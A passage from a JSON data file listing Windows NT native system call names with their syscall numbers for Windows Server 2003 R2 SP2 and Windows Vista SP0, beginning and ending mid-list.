\"NtCancelDeviceWakeupRequest\": 112, \"NtCompactKeys\": 113, \"NtCompareTokens\": 114, \"NtCompleteConnectPort\": 115, \"NtCompressKey\": 116, \"NtConnectPort\": 117, \"NtCreateDebugObject\": 118, \"NtCreateDirectoryObject\": 119, \"NtCreateEventPair\": 120, \"NtCreateIoCompletion\": 121, \"NtCreateJobObject\": 122, \"NtCreateJobSet\": 123, \"NtCreateKeyedEvent\": 124, \"NtCreateMailslotFile\": 125, \"NtCreateMutant\": 126, \"NtCreateNamedPipeFile\": 127, \"NtCreatePagingFile\": 128, \"NtCreatePort\": 129, \"NtCreateProcess\": 130, \"NtCreateProfile\": 131, \"NtCreateSemaphore\": 132, \"NtCreateSymbolicLinkObject\": 133, \"NtCreateTimer\": 134, \"NtCreateToken\": 135, \"NtCreateWaitablePort\": 136, \"NtDebugActiveProcess\": 137, \"NtDebugContinue\": 138, \"NtDeleteAtom\": 139, \"NtDeleteBootEntry\": 140, \"NtDeleteDriverEntry\": 141, \"NtDeleteFile\": 142, \"NtDeleteKey\": 143, \"NtDeleteObjectAuditAlarm\": 144, \"NtDeleteValueKey\": 145, \"NtDisplayString\": 146, \"NtEnumerateBootEntries\": 147, \"NtEnumerateDriverEntries\": 148, \"NtEnumerateSystemEnvironmentValuesEx\": 149, \"NtExtendSection\": 150, \"NtFilterToken\": 151, \"NtFlushInstructionCache\": 152, \"NtFlushKey\": 153, \"NtFlushVirtualMemory\": 154, \"NtFlushWriteBuffer\": 155, \"NtFreeUserPhysicalPages\": 156, \"NtGetContextThread\": 157, \"NtGetCurrentProcessorNumber\": 158, \"NtGetDevicePowerState\": 159, \"NtGetPlugPlayEvent\": 160, \"NtGetWriteWatch\": 161, \"NtImpersonateAnonymousToken\": 162, \"NtImpersonateThread\": 163, \"NtInitializeRegistry\": 164, \"NtInitiatePowerAction\": 165, \"NtIsSystemResumeAutomatic\": 166, \"NtListenPort\": 167, \"NtLoadDriver\": 168, \"NtLoadKey\": 169, \"NtLoadKey2\": 170, \"NtLoadKeyEx\": 171, \"NtLockFile\": 172, \"NtLockProductActivationKeys\": 173, \"NtLockRegistryKey\": 174, \"NtLockVirtualMemory\": 175, \"NtMakePermanentObject\": 176, \"NtMakeTemporaryObject\": 177, \"NtMapUserPhysicalPages\": 178, \"NtModifyBootEntry\": 179, \"NtModifyDriverEntry\": 180, \"NtNotifyChangeDirectoryFile\": 181, \"NtNotifyChangeKey\": 182, \"NtNotifyChangeMultipleKeys\": 183, \"NtOpenEventPair\": 184, \"NtOpenIoCompletion\": 185, \"NtOpenJobObject\": 186, \"NtOpenKeyedEvent\": 187, \"NtOpenMutant\": 188, \"NtOpenObjectAuditAlarm\": 189, \"NtOpenProcessToken\": 190, \"NtOpenSemaphore\": 191, \"NtOpenSymbolicLinkObject\": 192, \"NtOpenThread\": 193, \"NtOpenTimer\": 194, \"NtPlugPlayControl\": 195, \"NtPrivilegeCheck\": 196, \"NtPrivilegeObjectAuditAlarm\": 197, \"NtPrivilegedServiceAuditAlarm\": 198, \"NtPulseEvent\": 199, \"NtQueryBootEntryOrder\": 200, \"NtQueryBootOptions\": 201, \"NtQueryDebugFilterState\": 202, \"NtQueryDirectoryObject\": 203, \"NtQueryDriverEntryOrder\": 204, \"NtQueryEaFile\": 205, \"NtQueryFullAttributesFile\": 206, \"NtQueryInformationAtom\": 207, \"NtQueryInformationJobObject\": 208, \"NtQueryInformationPort\": 209, \"NtQueryInstallUILanguage\": 210, \"NtQueryIntervalProfile\": 211, \"NtQueryIoCompletion\": 212, \"NtQueryMultipleValueKey\": 213, \"NtQueryMutant\": 214, \"NtQueryOpenSubKeys\": 215, \"NtQueryOpenSubKeysEx\": 216, \"NtQueryPortInformationProcess\": 217, \"NtQueryQuotaInformationFile\": 218, \"NtQuerySecurityObject\": 219, \"NtQuerySemaphore\": 220, \"NtQuerySymbolicLinkObject\": 221, \"NtQuerySystemEnvironmentValue\": 222, \"NtQuerySystemEnvironmentValueEx\": 223, \"NtQueryTimerResolution\": 224, \"NtRaiseException\": 225, \"NtRaiseHardError\": 226, \"NtRegisterThreadTerminatePort\": 227, \"NtReleaseKeyedEvent\": 228, \"NtRemoveProcessDebug\": 229, \"NtRenameKey\": 230, \"NtReplaceKey\": 231, \"NtReplyWaitReplyPort\": 232, \"NtRequestDeviceWakeup\": 233, \"NtRequestPort\": 234, \"NtRequestWakeupLatency\": 235, \"NtResetEvent\": 236, \"NtResetWriteWatch\": 237, \"NtRestoreKey\": 238, \"NtResumeProcess\": 239, \"NtSaveKey\": 240, \"NtSaveKeyEx\": 241, \"NtSaveMergedKeys\": 242, \"NtSecureConnectPort\": 243, \"NtSetBootEntryOrder\": 244, \"NtSetBootOptions\": 245, \"NtSetContextThread\": 246, \"NtSetDebugFilterState\": 247, \"NtSetDefaultHardErrorPort\": 248, \"NtSetDefaultLocale\": 249, \"NtSetDefaultUILanguage\": 250, \"NtSetDriverEntryOrder\": 251, \"NtSetEaFile\": 252, \"NtSetHighEventPair\": 253, \"NtSetHighWaitLowEventPair\": 254, \"NtSetInformationDebugObject\": 255, \"NtSetInformationJobObject\": 256, \"NtSetInformationKey\": 257, \"NtSetInformationToken\": 258, \"NtSetIntervalProfile\": 259, \"NtSetIoCompletion\": 260, \"NtSetLdtEntries\": 261, \"NtSetLowEventPair\": 262, \"NtSetLowWaitHighEventPair\": 263, \"NtSetQuotaInformationFile\": 264, \"NtSetSecurityObject\": 265, \"NtSetSystemEnvironmentValue\": 266, \"NtSetSystemEnvironmentValueEx\": 267, \"NtSetSystemInformation\": 268, \"NtSetSystemPowerState\": 269, \"NtSetSystemTime\": 270, \"NtSetThreadExecutionState\": 271, \"NtSetTimerResolution\": 272, \"NtSetUuidSeed\": 273, \"NtSetVolumeInformationFile\": 274, \"NtShutdownSystem\": 275, \"NtSignalAndWaitForSingleObject\": 276, \"NtStartProfile\": 277, \"NtStopProfile\": 278, \"NtSuspendProcess\": 279, \"NtSuspendThread\": 280, \"NtSystemDebugControl\": 281, \"NtTerminateJobObject\": 282, \"NtTestAlert\": 283, \"NtTranslateFilePath\": 284, \"NtUnloadDriver\": 285, \"NtUnloadKey\": 286, \"NtUnloadKey2\": 287, \"NtUnloadKeyEx\": 288, \"NtUnlockFile\": 289, \"NtUnlockVirtualMemory\": 290, \"NtVdmControl\": 291, \"NtWaitForDebugEvent\": 292, \"NtWaitForKeyedEvent\": 293, \"NtWaitHighEventPair\": 294, \"NtWaitLowEventPair\": 295}, \"R2 SP2\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateUserPhysicalPages\": 108, \"NtAllocateUuids\": 109, \"NtAreMappedFilesTheSame\": 110, \"NtAssignProcessToJobObject\": 111, \"NtCancelDeviceWakeupRequest\": 112, \"NtCompactKeys\": 113, \"NtCompareTokens\": 114, \"NtCompleteConnectPort\": 115, \"NtCompressKey\": 116, \"NtConnectPort\": 117, \"NtCreateDebugObject\": 118, \"NtCreateDirectoryObject\": 119, \"NtCreateEventPair\": 120, \"NtCreateIoCompletion\": 121, \"NtCreateJobObject\": 122, \"NtCreateJobSet\": 123, \"NtCreateKeyedEvent\": 124, \"NtCreateMailslotFile\": 125, \"NtCreateMutant\": 126, \"NtCreateNamedPipeFile\": 127, \"NtCreatePagingFile\": 128, \"NtCreatePort\": 129, \"NtCreateProcess\": 130, \"NtCreateProfile\": 131, \"NtCreateSemaphore\": 132, \"NtCreateSymbolicLinkObject\": 133, \"NtCreateTimer\": 134, \"NtCreateToken\": 135, \"NtCreateWaitablePort\": 136, \"NtDebugActiveProcess\": 137, \"NtDebugContinue\": 138, \"NtDeleteAtom\": 139, \"NtDeleteBootEntry\": 140, \"NtDeleteDriverEntry\": 141, \"NtDeleteFile\": 142, \"NtDeleteKey\": 143, \"NtDeleteObjectAuditAlarm\": 144, \"NtDeleteValueKey\": 145, \"NtDisplayString\": 146, \"NtEnumerateBootEntries\": 147, \"NtEnumerateDriverEntries\": 148, \"NtEnumerateSystemEnvironmentValuesEx\": 149, \"NtExtendSection\": 150, \"NtFilterToken\": 151, \"NtFlushInstructionCache\": 152, \"NtFlushKey\": 153, \"NtFlushVirtualMemory\": 154, \"NtFlushWriteBuffer\": 155, \"NtFreeUserPhysicalPages\": 156, \"NtGetContextThread\": 157, \"NtGetCurrentProcessorNumber\": 158, \"NtGetDevicePowerState\": 159, \"NtGetPlugPlayEvent\": 160, \"NtGetWriteWatch\": 161, \"NtImpersonateAnonymousToken\": 162, \"NtImpersonateThread\": 163, \"NtInitializeRegistry\": 164, \"NtInitiatePowerAction\": 165, \"NtIsSystemResumeAutomatic\": 166, \"NtListenPort\": 167, \"NtLoadDriver\": 168, \"NtLoadKey\": 169, \"NtLoadKey2\": 170, \"NtLoadKeyEx\": 171, \"NtLockFile\": 172, \"NtLockProductActivationKeys\": 173, \"NtLockRegistryKey\": 174, \"NtLockVirtualMemory\": 175, \"NtMakePermanentObject\": 176, \"NtMakeTemporaryObject\": 177, \"NtMapUserPhysicalPages\": 178, \"NtModifyBootEntry\": 179, \"NtModifyDriverEntry\": 180, \"NtNotifyChangeDirectoryFile\": 181, \"NtNotifyChangeKey\": 182, \"NtNotifyChangeMultipleKeys\": 183, \"NtOpenEventPair\": 184, \"NtOpenIoCompletion\": 185, \"NtOpenJobObject\": 186, \"NtOpenKeyedEvent\": 187, \"NtOpenMutant\": 188, \"NtOpenObjectAuditAlarm\": 189, \"NtOpenProcessToken\": 190, \"NtOpenSemaphore\": 191, \"NtOpenSymbolicLinkObject\": 192, \"NtOpenThread\": 193, \"NtOpenTimer\": 194, \"NtPlugPlayControl\": 195, \"NtPrivilegeCheck\": 196, \"NtPrivilegeObjectAuditAlarm\": 197, \"NtPrivilegedServiceAuditAlarm\": 198, \"NtPulseEvent\": 199, \"NtQueryBootEntryOrder\": 200, \"NtQueryBootOptions\": 201, \"NtQueryDebugFilterState\": 202, \"NtQueryDirectoryObject\": 203, \"NtQueryDriverEntryOrder\": 204, \"NtQueryEaFile\": 205, \"NtQueryFullAttributesFile\": 206, \"NtQueryInformationAtom\": 207, \"NtQueryInformationJobObject\": 208, \"NtQueryInformationPort\": 209, \"NtQueryInstallUILanguage\": 210, \"NtQueryIntervalProfile\": 211, \"NtQueryIoCompletion\": 212, \"NtQueryMultipleValueKey\": 213, \"NtQueryMutant\": 214, \"NtQueryOpenSubKeys\": 215, \"NtQueryOpenSubKeysEx\": 216, \"NtQueryPortInformationProcess\": 217, \"NtQueryQuotaInformationFile\": 218, \"NtQuerySecurityObject\": 219, \"NtQuerySemaphore\": 220, \"NtQuerySymbolicLinkObject\": 221, \"NtQuerySystemEnvironmentValue\": 222, \"NtQuerySystemEnvironmentValueEx\": 223, \"NtQueryTimerResolution\": 224, \"NtRaiseException\": 225, \"NtRaiseHardError\": 226, \"NtRegisterThreadTerminatePort\": 227, \"NtReleaseKeyedEvent\": 228, \"NtRemoveProcessDebug\": 229, \"NtRenameKey\": 230, \"NtReplaceKey\": 231, \"NtReplyWaitReplyPort\": 232, \"NtRequestDeviceWakeup\": 233, \"NtRequestPort\": 234, \"NtRequestWakeupLatency\": 235, \"NtResetEvent\": 236, \"NtResetWriteWatch\": 237, \"NtRestoreKey\": 238, \"NtResumeProcess\": 239, \"NtSaveKey\": 240, \"NtSaveKeyEx\": 241, \"NtSaveMergedKeys\": 242, \"NtSecureConnectPort\": 243, \"NtSetBootEntryOrder\": 244, \"NtSetBootOptions\": 245, \"NtSetContextThread\": 246, \"NtSetDebugFilterState\": 247, \"NtSetDefaultHardErrorPort\": 248, \"NtSetDefaultLocale\": 249, \"NtSetDefaultUILanguage\": 250, \"NtSetDriverEntryOrder\": 251, \"NtSetEaFile\": 252, \"NtSetHighEventPair\": 253, \"NtSetHighWaitLowEventPair\": 254, \"NtSetInformationDebugObject\": 255, \"NtSetInformationJobObject\": 256, \"NtSetInformationKey\": 257, \"NtSetInformationToken\": 258, \"NtSetIntervalProfile\": 259, \"NtSetIoCompletion\": 260, \"NtSetLdtEntries\": 261, \"NtSetLowEventPair\": 262, \"NtSetLowWaitHighEventPair\": 263, \"NtSetQuotaInformationFile\": 264, \"NtSetSecurityObject\": 265, \"NtSetSystemEnvironmentValue\": 266, \"NtSetSystemEnvironmentValueEx\": 267, \"NtSetSystemInformation\": 268, \"NtSetSystemPowerState\": 269, \"NtSetSystemTime\": 270, \"NtSetThreadExecutionState\": 271, \"NtSetTimerResolution\": 272, \"NtSetUuidSeed\": 273, \"NtSetVolumeInformationFile\": 274, \"NtShutdownSystem\": 275, \"NtSignalAndWaitForSingleObject\": 276, \"NtStartProfile\": 277, \"NtStopProfile\": 278, \"NtSuspendProcess\": 279, \"NtSuspendThread\": 280, \"NtSystemDebugControl\": 281, \"NtTerminateJobObject\": 282, \"NtTestAlert\": 283, \"NtTranslateFilePath\": 284, \"NtUnloadDriver\": 285, \"NtUnloadKey\": 286, \"NtUnloadKey2\": 287, \"NtUnloadKeyEx\": 288, \"NtUnlockFile\": 289, \"NtUnlockVirtualMemory\": 290, \"NtVdmControl\": 291, \"NtWaitForDebugEvent\": 292, \"NtWaitForKeyedEvent\": 293, \"NtWaitHighEventPair\": 294, \"NtWaitLowEventPair\": 295}}, \"Windows Vista\": {\"SP0\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAcquireCMFViewOwnership\": 102, \"NtAddBootEntry\": 103, \"NtAddDriverEntry\": 104, \"NtAdjustGroupsToken\": 105, \"NtAlertResumeThread\": 106, \"NtAlertThread\": 107, \"NtAllocateLocallyUniqueId\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtCancelDeviceWakeupRequest\": 134, \"NtCancelIoFileEx\": 135, \"NtCancelSynchronousIoFile\": 136, \"NtClearAllSavepointsTransaction\": 137, \"NtClearSavepointTransaction\": 138, \"NtCommitComplete\": 139, \"NtCommitEnlistment\": 140, \"NtCommitTransaction\": 141, \"NtCompactKeys\": 142, \"NtCompareTokens\": 143, \"NtCompleteConnectPort\": 144, \"NtCompressKey\": 145, \"NtConnectPort\": 146, \"NtCreateDebugObject\": 147, \"NtCreateDirectoryObject\": 148, \"NtCreateEnlistment\": 149, \"NtCreateEventPair\": 150, \"NtCreateIoCompletion\": 151, \"NtCreateJobObject\": 152, \"NtCreateJobSet\": 153, \"NtCreateKeyTransacted\": 154, \"NtCreateKeyedEvent\": 155, \"NtCreateMailslotFile\": 156, \"NtCreateMutant\": 157, \"NtCreateNamedPipeFile\": 158, \"NtCreatePagingFile\": 159, \"NtCreatePort\": 160, \"NtCreatePrivateNamespace\": 161, \"NtCreateProcess\": 162, \"NtCreateProfile\": 163, \"NtCreateResourceManager\": 164, \"NtCreateSemaphore\": 165, \"NtCreateSymbolicLinkObject\": 166, \"NtCreateThreadEx\": 167, \"NtCreateTimer\": 168, \"NtCreateToken\": 169, \"NtCreateTransaction\": 170, \"NtCreateTransactionManager\": 171, \"NtCreateUserProcess\": 172, \"NtCreateWaitablePort\": 173, \"NtCreateWorkerFactory\": 174, \"NtDebugActiveProcess\": 175, \"NtDebugContinue\": 176, \"NtDeleteAtom\": 177, \"NtDeleteBootEntry\": 178, \"NtDeleteDriverEntry\": 179, \"NtDeleteFile\": 180, \"NtDeleteKey\": 181, \"NtDeleteObjectAuditAlarm\": 182, \"NtDeletePrivateNamespace\": 183, \"NtDeleteValueKey\": 184, \"NtDisplayString\": 185, \"NtEnumerateBootEntries\": 186, \"NtEnumerateDriverEntries\": 187, \"NtEnumerateSystemEnvironmentValuesEx\": 188, \"NtEnumerateTransactionObject\": 189, \"NtExtendSection\": 190, \"NtFilterToken\": 191, \"NtFlushInstallUILanguage\": 192, \"NtFlushInstructionCache\": 193, \"NtFlushKey\": 194, \"NtFlushProcessWriteBuffers\": 195, \"NtFlushVirtualMemory\": 196, \"NtFlushWriteBuffer\": 197, \"NtFreeUserPhysicalPages\": 198, \"NtFreezeRegistry\": 199, \"NtFreezeTransactions\": 200, \"NtGetContextThread\": 201, \"NtGetCurrentProcessorNumber\": 202, \"NtGetDevicePowerState\": 203, \"NtGetMUIRegistryInfo\": 204, \"NtGetNextProcess\": 205, \"NtGetNextThread\": 206, \"NtGetNlsSectionPtr\": 207, \"NtGetNotificationResourceManager\": 208, \"NtGetPlugPlayEvent\": 209, \"NtGetWriteWatch\": 210, \"NtImpersonateAnonymousToken\": 211, \"NtImpersonateThread\": 212, \"NtInitializeNlsFiles\": 213, \"NtInitializeRegistry\": 214, \"NtInitiatePowerAction\": 215, \"NtIsSystemResumeAutomatic\": 216, \"NtIsUILanguageComitted\": 217, \"NtListTransactions\": 218, \"NtListenPort\": 219, \"NtLoadDriver\": 220, \"NtLoadKey\": 221, \"NtLoadKey2\": 222, \"NtLoadKeyEx\": 223, \"NtLockFile\": 224, \"NtLockProductActivationKeys\": 225, \"NtLockRegistryKey\": 226, \"NtLockVirtualMemory\": 227, \"NtMakePermanentObject\": 228, \"NtMakeTemporaryObject\": 229, \"NtMapCMFModule\": 230, \"NtMapUserPhysicalPages\": 231, \"NtMarshallTransaction\": 232, \"NtModifyBootEntry\": 233, \"NtModifyDriverEntry\": 234, \"NtNotifyChangeDirectoryFile\": 235, \"NtNotifyChangeKey\": 236, \"NtNotifyChangeMultipleKeys\": 237, \"NtOpenEnlistment\": 238, \"NtOpenEventPair\": 239, \"NtOpenIoCompletion\": 240, \"NtOpenJobObject\": 241, \"NtOpenKeyTransacted\": 242, \"NtOpenKeyedEvent\": 243, \"NtOpenMutant\": 244, \"NtOpenObjectAuditAlarm\": 245, \"NtOpenPrivateNamespace\": 246, \"NtOpenProcessToken\": 247, \"NtOpenResourceManager\": 248, \"NtOpenSemaphore\": 249, \"NtOpenSession\": 250, \"NtOpenSymbolicLinkObject\": 251, \"NtOpenThread\": 252, \"NtOpenTimer\": 253, \"NtOpenTransaction\": 254, \"NtOpenTransactionManager\": 255, \"NtPlugPlayControl\": 256, \"NtPrePrepareComplete\": 257, \"NtPrePrepareEnlistment\": 258, \"NtPrepareComplete\": 259, \"NtPrepareEnlistment\": 260, \"NtPrivilegeCheck\": 261, \"NtPrivilegeObjectAuditAlarm\": 262, \"NtPrivilegedServiceAuditAlarm\": 263, \"NtPropagationComplete\": 264, \"NtPropagationFailed\": 265, \"NtPullTransaction\": 266, \"NtPulseEvent\": 267, \"NtQueryBootEntryOrder\": 268, \"NtQueryBootOptions\": 269, \"NtQueryDebugFilterState\": 270, \"NtQueryDirectoryObject\": 271, \"NtQueryDriverEntryOrder\": 272, \"NtQueryEaFile\": 273, \"NtQueryFullAttributesFile\": 274, \"NtQueryInformationAtom\": 275, \"NtQueryInformationEnlistment\": 276, \"NtQueryInformationJobObject\": 277, \"NtQueryInformationPort\": 278, \"NtQueryInformationResourceManager\": 279, \"NtQueryInformationTransaction\": 280, \"NtQueryInformationTransactionManager\": 281, \"NtQueryInformationWorkerFactory\": 282, \"NtQueryInstallUILanguage\": 283, \"NtQueryIntervalProfile\": 284, \"NtQueryIoCompletion\": 285, \"NtQueryLicenseValue\": 286, \"NtQueryMultipleValueKey\": 287, \"NtQueryMutant\": 288, \"NtQueryOpenSubKeys\": 289, \"NtQueryOpenSubKeysEx\": 290, \"NtQueryPortInformationProcess\": 291, \"NtQueryQuotaInformationFile\": 292, \"NtQuerySecurityObject\": 293, \"NtQuerySemaphore\": 294, \"NtQuerySymbolicLinkObject\": 295, \"NtQuerySystemEnvironmentValue\": 296, \"NtQuerySystemEnvironmentValueEx\": 297, \"NtQueryTimerResolution\": 298, \"NtRaiseException\": 299, \"NtRaiseHardError\": 300, \"NtReadOnlyEnlistment\": 301, \"NtRecoverEnlistment\": 302, \"NtRecoverResourceManager\": 303, \"NtRecoverTransactionManager\": 304, \"NtRegisterProtocolAddressInformation\": 305, \"NtRegisterThreadTerminatePort\": 306, \"NtReleaseCMFViewOwnership\": 307, \"NtReleaseKeyedEvent\": 308, \"NtReleaseWorkerFactoryWorker\": 309, \"NtRemoveIoCompletionEx\": 310, \"NtRemoveProcessDebug\": 311, \"NtRenameKey\": 312, \"NtReplaceKey\": 313, \"NtReplyWaitReplyPort\": 314, \"NtRequestDeviceWakeup\": 315, \"NtRequestPort\": 316, \"NtRequestWakeupLatency\": 317, \"NtResetEvent\": 318, \"NtResetWriteWatch\": 319, \"NtRestoreKey\": 320, \"NtResumeProcess\": 321, \"NtRollbackComplete\": 322, \"NtRollbackEnlistment\": 323, \"NtRollbackSavepointTransaction\": 324, \"NtRollbackTransaction\": 325, \"NtRollforwardTransactionManager\": 326, \"NtSaveKey\": 327, \"NtSaveKeyEx\": 328, \"NtSaveMergedKeys\": 329, \"NtSavepointComplete\": 330, \"NtSavepointTransaction\": 331, \"NtSecureConnectPort\": 332, \"NtSetBootEntryOrder\": 333, \"NtSetBootOptions\": 334, \"NtSetContextThread\": 335, \"NtSetDebugFilterState\": 336, \"NtSetDefaultHardErrorPort\": 337, \"NtSetDefaultLocale\": 338, \"NtSetDefaultUILanguage\": 339, \"NtSetDriverEntryOrder\": 340, \"NtSetEaFile\": 341, \"NtSetHighEventPair\": 342, \"NtSetHighWaitLowEventPair\": 343, \"NtSetInformationDebugObject\": 344, \"NtSetInformationEnlistment\": 345, \"NtSetInformationJobObject\": 346, \"NtSetInformationKey\": 347, \"NtSetInformationResourceManager\": 348, \"NtSetInformationToken\": 349, \"NtSetInformationTransaction\": 350, \"NtSetInformationTransactionManager\": 351, \"NtSetInformationWorkerFactory\": 352, \"NtSetIntervalProfile\": 353, \"NtSetIoCompletion\": 354, \"NtSetLdtEntries\": 355, \"NtSetLowEventPair\": 356, \"NtSetLowWaitHighEventPair\": 357, \"NtSetQuotaInformationFile\": 